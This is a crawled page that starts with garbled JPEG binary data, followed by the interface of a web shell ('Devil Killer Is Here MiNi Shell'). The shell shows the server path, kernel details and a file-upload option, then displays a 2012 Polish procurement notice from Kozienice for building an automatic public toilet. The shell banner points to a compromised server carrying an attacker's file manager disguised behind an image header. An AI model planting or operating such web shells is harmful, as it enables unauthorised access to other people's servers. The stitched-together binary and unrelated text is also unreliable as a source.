JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120828/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120828/317328-N-2012.html

<p class="kh_header"><b>Kozienice: Budowa toalety miejskiej</b><br>
<b>Numer ogłoszenia: 317328 - 2012; data zamieszczenia: 28.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kozienice , ul. Parkowa 5, 26-900 Kozienice, woj. mazowieckie, tel. 048 6117100, faks 048 6142048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa toalety miejskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

Dostarczenie, montaż i uruchomienie prefabrykowanej automatycznej  toalety miejskiej (publicznej)  wraz z wykonaniem robót budowlanych związanych z realizacją zamówienia oraz odpowiednim dostosowaniem istniejącej infrastruktury w zakresie  i w lokalizacji wskazanej przez Zamawiającego, określonych w dokumentacji projektowej. Zakres robót obejmuje:
.	rozbiórkę  istniejącego obiektu wraz z wyposażeniem,
.	demontaż instalacji elektrycznej i sanitarnej,
.	wykonanie płyty fundamwntowej żelbetowej,
.	montaż prefabrykowanej toalety wraz z instalacją wodno-kanalizacyjną i elektryczną,
.	budowę chodnika,
.	budowę przyłącza wodno-kanalizacyjnego,
.	budowę zasilania w energię elektryczną,
.	przywrócenie terenu objętego budową do stanu pierwotnego.
Realizacja zadania obejmująca :
-	rozbiórkę istniejącego obiektu wraz z demontażem instalacji elektrycznej, wodociagowej, kanalizacyjnej,
-	dostarczenie, montaż i uruchomienie prefabrykowanej, automatycznej toalety publicznej,
-	wykonanie robót budowlanych związanych z montażem toalety,
-	dostosowanie istniejącej infrastruktury w zakresie i lokalizacji określonych w dokumentacji projektowej,
-	wykonanie chodnika umożliwiającego dojście lub dojazd do toalety, 
-	wykonanie gwarancyjnych przeglądów technicznych toalety.
Zakres rzeczowy obejmuje w szczególności:  

1.- roboty  ziemne :
-	roboty pomiarowe,
-	wykop pod fundament w formie płyty żelbetowej, 
-	zasypanie wykopów,
2.- roboty żelbetowe:
-	wykonanie podsypki piaskowej pod płytą żelbetową, 
-	warstwa chudego betonu,
-	izolacja przeciwwilgociowa,
-	płyta fundamentow żelbetowa ,
-	izolacja pozioma z 2-ch warstw lepiku,
3.- dostarczenie i montaż, fabrycznie nowej, gotowej do użytku, wolnostojącej,  prefabrykowanej, bezobsługowej wymagającej jedynie okresowych przegladów serwisowych, automatycznej toalety publicznej, spełniającej wymogi bezpieczeństwa i jakości określone obowiązującymi przepisami, przystosowanej do korzystania przez osoby niepełnosprawne, komletnie wyposażonej:
-      w pełną automatykę tj. w urządzenia sterowane elektronicznie, w tym:
-	automatyczne drzwi wejściowe otwierane na przycisk i automatycznie zamykające się, połączone z elektronicznym poborem monet, sterownikiem stanu toalety (WOLNE, ZAJĘTE, NIECZYNNE), ograniczeniem czasu użytkowania oraz funkcji oświetlenia, wentylacji i czyszczenia, wyposażone zgodnie z dokumentacją projektową, 
-	w czujniki WEJŚCIE - WYJŚCIE,
-	w muszlę ustępową z automatycznym spłukiwaniem oraz myciem, suszeniem i dezynfekcją deski sedesowej, 
-	należy uwzględnić system automatycznego zmywania podłogi,
-      automatycznym podajnikiem papieru,
-      automatycznym zespołem umywalkowym z funkcją sekwencyjnego podawania mydła,  
       ciepłej wody i suszenia rąk,
-      systemem alarmowy połaczony z automatycznym otwarciem drzwi oraz system zdalnego  
       powiadamiania służb miejskich poprzez wysyłanie wiadomości SMS,
-	pochwyty dla niepełnosprawnych,
-	przewijak dla niemowląt - podnoszony,
-	daszek zewnetrzny nad wejściem,
-	instalacje: wody zimnej i ciepłej, kanalizacji sanitarnej, wentylację grawitacyjną i mechaniczną, ogrzewania, alarmową, powiadamiania GSM, elektryczną, 
-	w urządzenia:
- muszlę ustępową automatycznie spłukiwaną z dezynfekowaną deską sedesową,
- automatyczny podajnik dpapieru toaletowego, elektryczny oraz ręczny zapasowy podajnik papieru,
- umywalkę z automatycznym uruchamianiem wody za pomocą sensora, dozownikiem mydła i suszarką do rąk ciepłym powietrzem,
- kratkę ściekową i złączką do wężą oraz wężem giętkim z końcówką do zmywania,
- pojemnik na śmieci,
- lustro,
- wieszaki ubraniowe,
- szczotkę do ręcznego doczyszczania muszli ustępowej,
- dyfuzor zapachów,
- plan higieny,
- komplet startowy narzedzi,
-	komplet środków czystości, 
-	w czytelne informacje dla użytkownika (instrukcje),
-	system zabezpieczeń,
-	sygnalizację awarii,
-	automatyczne oświetlenie wewnętrzne i awaryjne,
4.- dostarczenie i montaż stojaka na rowery,
5.- wykonanie przyłącza wodociągowego:
-	roboty ziemne (wykopy z zasypaniem),
-	montaż rur wraz z ich uzbrojeniem,
-	montaż zestawu wodomierzowego,
-	próby drożności i szczelności,
-	dezynfekcja przyłącza,
6.- wykonanie przyłacza kanalizacji sanitarnej:
-	roboty ziemne (wykopy, zasypanie),
-	montaż rur kanalizacyjnych wraz z ich uzbrojeniem,
-	wykonanie studzienki rewizyjnej kompletnie wyposażonej,
7.- chodnik z kostki betonowej kolorowej  gr 6cm stanowiący dojście do toalety, umożliwiający wjazd wózkiem,
8.- rozbiórkę istniejącej toalety wraz z załadunkiem, transportem i rozładunkiem zdemontowanej toalety w siedzibie KGK Kozienice przy ul. Przemysłowej 15,
9.- demontaż instalacji elektrycznej, wodociągowej i kanalizacyjnej, 
10.- odłączenie istniejących instalacji od sieci zewnętrznych,
11.- wyposażenie toalety w czytelną instrukcję użytkowania min. w trzech językach (polskim, angielskim i niemieckim),
12.- szkolenie pracowników KGK w zakresie obsługi toalety,
13.- kompleksową obsługę geodezyjną zachowując postanowienia  Roz.M.G.P.iB. z dn.21.02.1995r (Dz. U. nr 25 poz.133) w sprawie  rodzaju i zakresu  opracowań   geodezyjno-kartograficznych oraz czynności geodezyjnych   obowiązujących  w  budownictwie, w tym czynności geodezyjne obowiązujące w budownictwie, w tym:
 -     prace    przygotowawcze,   
-      prace  pomiarowe  poparte  wpisami  w  dzienniku  budowy, 
-	bieżąca obsługa geodezyjna budowy, 
-	na żądanie wykonawcy i inwestora kontrolne pomiary elementów inwestycji, 
-	geodezyjna inwentaryzacja robót ulegających zakryciu oraz geodezyjna sytuacyjno-wysokościowa inwentaryzacja powykonawcza, wraz z podziałem szczegółowym na  rodzaj  i ilości wykonanych robot w podziale na branże - wg wymagań inspektora nadzoru lub Zamawiającego,
-	dokumentacja geodezyjno - kartograficzna obiektu w formie i zakresie przewidzianym  wymaganymi przepisami obowiązującymi na dzień  odbioru zadania w podziale na części dotyczące przebiegu inwestycji, zgodnie z wymaganiami Zamawiającego,
-	przekazanie zamawiającemu 5 kompletów  kopii mapy powstałej w wyniku geodezyjnej inwentaryzacji powykonawczej zarejestrowanej w Starostwie wraz z wykazem określającym  ilości wykonanych robót z podziałem na branże, rodzaje robót, średnice w zakresie terenu objętego robotami,
-	wykonanie czynności geodezyjnych w okresie rękojmi i gwarancji dla robót budowlanych,
14.- wykonanie robót pomocniczych, w tym:
.	nieodpłatne przeglądy i usuwanie uszkodzeń wynikających z wad produkcyjnych lub zastosowania wadliwych materiałów i urzadzeń w ramach gwarancyjnych przeglądów technicznych ,
.	poniesienie kosztów związanych z oznakowaniem terenu budowy zgodnym z przepisami, 
.	wywózka materiałów odpadowych (gruzu, gałęzi, karpin, dłużyc oraz innych) pochodzących z placu budowy  i ich utylizacja, 
.	wykonanie przez uprawnione laboratoria  pomiarów i badań w czasie realizacji inwestycji, potwierdzających jakość wykonanych robót,
.	przejęcie na siebie odpowiedzialności za szkody wobec osób trzecich w  związku z prowadzonymi robotami, 
.	powiadomienie z 2 tygodniowym wyprzedzeniem właścicieli urządzeń podziemnych , naziemnych i podziemnych oraz mieszkańców sąsiednich posesji o terminie prowadzenia robót i ewentualnych niedogodnościach z nimi zwiazanych (kopię powiadomień należy przekazać Zamawiającemu),
.	Wykonawca  na własny koszt dokona odkrywki elementów robót bidzących wątpliwości w celu sprawdzenia jakości ich wykonania, jeżeli wykonanie tych robót nie zostało zgłoszone do sprawdzenia przed ich zakryciem,
.	spełnienie warunków określonych przez ZWiK w Kozienicach,
.	uporządkowanie terenu bezpośrednio przylegającego do placu budowy,
.	prowadzenie prób, pomiarów, sparwdzeń i odbiorów przewidzianych warunkami technicznymi na własny koszt,
.	uzgadnianie  w formie pisemnej z autorem dokumentacji projektowej wszelkich zmian lub odstępstw od dokumentacji projektowej po uprzednim zgłoszeniu Zamawiającemu.

UWAGA - przy obliczeniu ceny oferty należy uwzględnić wszystkie roboty  niezbędne do prawidłowego funkcjonowania toalety, w tym określone w dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót. 
Obiekt zlokalizowany jest  na terenie, który podlega ochronie konserwatorskiej na podstawie ustaleń miejscowego planu zagospodarowania przestrzennego Centrum Miasta Kozienice, Uchwalonego Uchwałą Rady Miejskiej w Kozienicach. Zarówno lokalizacja jak i dokumentacja projektowa zostały uzgodnione przez Mazowieckiego Wojewódzkiego Konserwatora Zabytków. 
W ramach zadania wykonawca jest zobowiązany do wykonania robót pomocniczych, niezbędnych do wykonania i eksploatacji zadania,  w tym do :        
- wykonania robót towarzyszących związanych z inwestycją - robót  związanych z przygotowaniem placu budowy,  robót związanych z utrudnieniami wynikłymi w trakcie realizacji zadania - w przypadku wystąpienia  utrudnień   - ich likwidacja  demontaż  oraz  wykonania robót odtworzeniowych po likwidacji utrudnień   w tym urządzeń kolidujących  z przedmiotem umowy , uporządkowanie obszaru objętego robotami oraz sąsiadującego z pozostałości po prowadzonych robotach, na bieżąco porządkowanie  teren po  wykonanych  robotach , zabezpieczenia przed niekorzystnymi warunkami atmosferycznymi w sposób skuteczny obiektu wraz z jego poszczególnymi elementami, 

- wykonania przez uprawnione laboratoria  pomiarów i badań w czasie realizacji inwestycji, potwierdzających jakość wykonanych robót, zgodnie z wymaganiami stawianymi przez obowiązujące w dacie przyjęcia przedmiotu umowy normy  i  inne przepisy podmiotowe,

- prowadzenie robót w sposób nie kolidujący z funkcjonowaniem terenów sąsiadujących z inwestycją, 

- przez cały czas realizacji inwestycji trwałe, właściwe oznakowanie prowadzonych robót, zgodnie z obowiązującymi przepisami.
Do obowiązku Wykonawcy należy: 
.	urządzenie i zabezpieczenie obszaru objętego robotami ponosząc koszty z tym związane  w tym zużycia   energii elektrycznej i wody, wykonania i utrzymania na swój koszt wszelkich osłon, ogrodzenia, oznakowania i innych usług które może potrzebować do wykonania robót objętych niniejszą umową, 
.	niezwłoczne wykonanie robót koniecznych ze względu na bezpieczeństwo  lub zabezpieczenie   przed awarią, 
.	prowadzenie robót w sposób nie powodujący zagrożenia bezpieczeństwa ludzi i mienia, nie  powodując   szkodliwych  zmian w środowisku naturalnym,
.	pełna odpowiedzialności za obszar objęty robotami z chwilą jego przejęcia,
.	przyjęcie na siebie odpowiedzialności za szkody  wobec osób trzecich w związku z prowadzonymi robotami,  
.	podejmowanie wszelkich środków zapobiegawczych wymaganych przez rzetelną praktykę budowlaną oraz aktualne okoliczności, aby zabezpieczyć prawa właścicieli posesji sąsiadujących z    terenem budowy,
.	zapoznanie się z umiejscowieniem wszystkich istniejących sieci przed rozpoczęciem jakichkolwiek wykopów lub innych prac mogących uszkodzić istniejące uzbrojenie,
.	zabezpieczenie teren budowy przejmując skutki finansowe z tego tytułu, w tym   zabezpieczenie  go pod względem bhp , wykonanie potrzebnych miejsc składowania materiałów  we własnym zakresie i na własny koszt, po zakończeniu robót uporządkowanie obszaru objętego robotami i terenu z nim bezpośrednio sąsiadującego oraz miejsc składowania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.13.00-8, 45.21.55.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:
co najmniej jedno zamówienie którego przedmiotem była dostawa automatycznej toalety wraz z montażem i uruchomieniem  i załączy dokumenty potwierdzające, że dostawa ta została wykonana należycie. 
Ocena spełnienia ww warunku dokonana zostanie w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach. Z treści załączonych dokumentów musi wynikać, że ww warunek wykonawca spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje co najmniej 1 osobą która będzie pełnić funkcję kierownika budowy , posiadającą uprawnienia budowlane  do kierowania robotami budowlanymi w specjalnościm konstrukcyjno - budowlanej bez ograniczeń  w rozumieniu przepisów ustawy z dn. 7 lipca 1994r. Prawo Budowlane ( Dz.U. z 2006r. Nr 156, poz. 1118 ze zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednich przepisów obowiązujących na  terenie kraju z którego pochodzi dana osoba, które  w zakresie objetym zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w ww. specjalności.
Ocena spełnienia ww warunek dokonana zostanie w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach. Z treści załączonych dokumentów musi wynikać, że ww warunek wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">oświadczenie potwierdzające, że oferowana przez Wykonawcę materiały i urządzenia odpowiadają wymaganiom określonych norm  przewidzianych w dokumentacji projektowej przez zamawiającego (wg wzoru na załaczniku nr 10 do siwz).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)    stosowne Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie  
pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,

b)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,
c)	w przypadku gdy wykonawca będzie polegał na wiedzy, doświadczeniu i osobach zdolnych do wykonania zamówienia innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy - w takiej sytuacji zobowiązany jest przedłożyć pisemne zobowiązanie innych podmiotów (oryginału) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (np. wg wzoru - załącznik nr 7 lub inny równoważny dokument zawierający zakres określony w pkt. 8.1.2.1.siwz),
d).Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa  w pkt. 9.5 siwz, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia pkt. 9.5.2 siwz stosuje się odpowiednio.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian postanowień zawartej umowy w stosunku do treści oferty:
1.Terminu wykonania zadania w następujących przypadkach :
1.1.Niesprzyjających warunków  pogodowych.
1.2.Niedopełnieniu przez Zamawiającego jego obowiązków wynikających 
              z umowy.
1.3.Z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu 
      zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te  
      zmiany są korzystne dla Zamawiającego.
1.4.Z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed  
              zawarciem umowy przez doświadczonego wykonawcę, robót.
1.5.Z powodu okoliczności siły wyższej, np. wystapienia zdarzenia losowego 
              wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z 
              pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu lub 
              grożącego powstaniem szkody w znacznych rozmiarach.
1.6.Z powodu stanu wyższej konieczności, powodującego podjęcie działań w celu 
              uchylenia bezpośredniego niebezpieczeństwa grożącego dobru społecznemu lub 
              jakiemukolwiek dobru jednostki,
1.7.Z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to 
              działania nie są konsekwencją winy którejkolwiek ze stron.
1.8.Zawieszenie wykonania prac nie spowodowanych uchybieniami Wykonawcy,
2.W przypadku zaistnienia potrzeby zmiany rozwiązań technicznych gdy proponowane 
rozwiązanie jest równorzędne lub lepsze funkcjonalnie od zaproponowanego 
w projekcie,
3.Gdy wystąpiły takie okoliczności, których nie można było przewidzieć w chwili zawarcia 
        umowy i na które strony nie miały wpływu,
4.W przypadku zaistnienia uzasadnionej potrzeby zmiany podwykonawcy. 
